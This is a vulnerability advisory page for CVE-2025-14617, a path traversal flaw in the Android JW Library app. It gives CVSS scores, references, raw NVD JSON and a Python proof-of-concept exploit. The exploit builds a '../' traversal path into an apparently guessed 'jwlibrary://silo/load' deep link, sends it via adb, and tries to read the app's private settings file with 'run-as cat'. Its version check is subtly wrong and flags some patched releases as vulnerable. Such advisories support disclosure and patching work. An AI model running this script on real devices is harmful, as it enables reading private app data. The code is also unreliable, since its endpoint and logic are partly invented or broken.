CVE-2025-14617

Description

A vulnerability has been found in Jehovahs Witnesses JW Library App up to 15.5.1 on Android. Affected is an unknown function of the component org.jw.jwlibrary.mobile.activity.SiloContainer. Such manipulation leads to path traversal. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Jehovahs Witnesses JW Library App (Android) <= 15.5.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-14617 Path Traversal PoC for JW Library App (Android)
# This PoC demonstrates the path traversal vulnerability in SiloContainer component

import os
import subprocess
import re

def check_vulnerable_version(package_name="org.jw.jwlibrary"):
    """Check if JW Library version is vulnerable (<= 15.5.1)"""
    try:
        result = subprocess.run(
            ["adb", "shell", "dumpsys", "package", package_name],
            capture_output=True,
            text=True,
            timeout=10
        )
        version_match = re.search(r'versionName=([\d.]+)', result.stdout)
        if version_match:
            version = version_match.group(1)
            version_parts = [int(x) for x in version.split('.')]
            # Check if version <= 15.5.1
            if version_parts[0] < 15 or (version_parts[0] == 15 and version_parts[1] <= 5) or (version_parts[0] == 15 and version_parts[1] == 5 and version_parts[2] <= 1):
                return True, version
        return False, None
    except Exception as e:
        print(f"Error checking version: {e}")
        return None, None

def exploit_path_traversal(target_file="/data/data/org.jw.jwlibrary/shared_prefs/settings.xml"):
    """
    Exploit path traversal vulnerability in SiloContainer component
    Attack vector: Construct malicious path with ../ sequences
    """
    # Malicious path construction
    traversal_path = "../../../" + target_file.replace("/data/data/org.jw.jwlibrary/", "")
    
    # Simulate the vulnerable function call
    vulnerable_endpoint = f"jwlibrary://silo/load?path={traversal_path}"
    
    print(f"[*] Target: {target_file}")
    print(f"[*] Malicious path: {traversal_path}")
    print(f"[*] Constructed URI: {vulnerable_endpoint}")
    
    # Attempt to trigger the vulnerable component via ADB
    try:
        # Method 1: Using am start with custom URI
        subprocess.run(
            ["adb", "shell", "am", "start", "-a", "android.intent.action.VIEW", "-d", vulnerable_endpoint],
            capture_output=True,
            timeout=5
        )
        
        # Method 2: Direct file access attempt
        subprocess.run(
            ["adb", "shell", "run-as", "org.jw.jwlibrary", "cat", target_file],
            capture_output=True,
            timeout=5
        )
        
    except Exception as e:
        print(f"[!] Exploitation failed: {e}")
        return False
    
    return True

def verify_vulnerability():
    """Main verification routine"""
    print("=" * 60)
    print("CVE-2025-14617 Path Traversal Verification")
    print("Target: Jehovahs Witnesses JW Library App (<= 15.5.1)")
    print("Component: org.jw.jwlibrary.mobile.activity.SiloContainer")
    print("=" * 60)
    
    is_vulnerable, version = check_vulnerable_version()
    
    if is_vulnerable is True:
        print(f"[+] Device is running vulnerable version: {version}")
        exploit_path_traversal()
    elif is_vulnerable is False:
        print("[-] Device is NOT vulnerable (version > 15.5.1)")
    else:
        print("[!] Unable to determine vulnerability status")

if __name__ == "__main__":
    verify_vulnerability()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14617
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14617
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14617/
[4] VulDB https://vuldb.com/cve/CVE-2025-14617
[5] https://github.com/Secsys-FDU/AF_CVEs/issues/1
[6] https://vuldb.com/?ctiid.336303
[7] https://vuldb.com/?id.336303
[8] https://vuldb.com/?submit.705077

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14617", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:53.023", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Jehovahs Witnesses JW Library App up to 15.5.1 on Android. Affected is an unknown function of the component org.jw.jwlibrary.mobile.activity.SiloContainer. Such manipulation leads to path traversal. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 4.3, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 3.1, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/Secsys-FDU/AF_CVEs/issues/1", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.336303", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.336303", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.705077", "source": "[email protected]"}]}}